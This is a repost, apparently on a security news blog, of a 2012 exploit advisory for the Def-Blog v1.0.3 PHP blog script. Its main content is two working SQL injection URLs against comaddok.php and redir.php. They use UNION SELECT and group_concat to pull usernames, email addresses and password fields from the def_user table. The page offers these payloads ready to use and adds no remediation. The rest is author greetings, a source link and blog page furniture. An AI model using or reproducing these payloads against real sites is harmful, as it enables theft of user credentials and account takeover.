[webapps / 0day] – Def-Blog v1.0.3 sql injection vulnerability

Jan.27, 2012 in Exploits

+————————————————————————-+

# Exploit Title : Def-Blog v1.0.3 sql injection Vulnerability
# version : V 1.0.3 and V 1.0.2
# Author : Cyber-Crystal
# Date : n/a
# Software Link : http://www.easy-script.com/scripts-PHP/def-blog-v103-1981.html
+————————————————————————-+

[+] Exploits

http://localhost:8080/blog/comaddok.php?article=-1+union+select+1,group_concat%28pseudo,0×3e,mail,0×3e,mdp%29+from+def_user%20–

http://localhost:8080/blog/redir.php?id=-2+UnioN+Select+1,2,group_concat%28pseudo,0×3e,mail,0×3e,mdp%29+from+def_user%20–

############################
# Greetz 2 : All man #
# home : v4-team.com #
# Cyb3r.Crystal@Gmail.com #
# The End /////////////////#

# [1337day.com][1] [2012-01-27]

[1]: http://www.1337day.com/

Source: http://www.1337day.com/exploits/17446

Quote

We use Linux for all our mission-critical applications. Having the source code means that we are not held hostage by anyone's support department.

Categories
- Exploits
- News

M	T	W	T	F	S	S
« Dec				Feb »
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28	29
30	31

Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

[webapps / 0day] – Def-Blog v1.0.3 sql injection vulnerability

Leave a Reply

Quote

Categories

Calendar

Recent Posts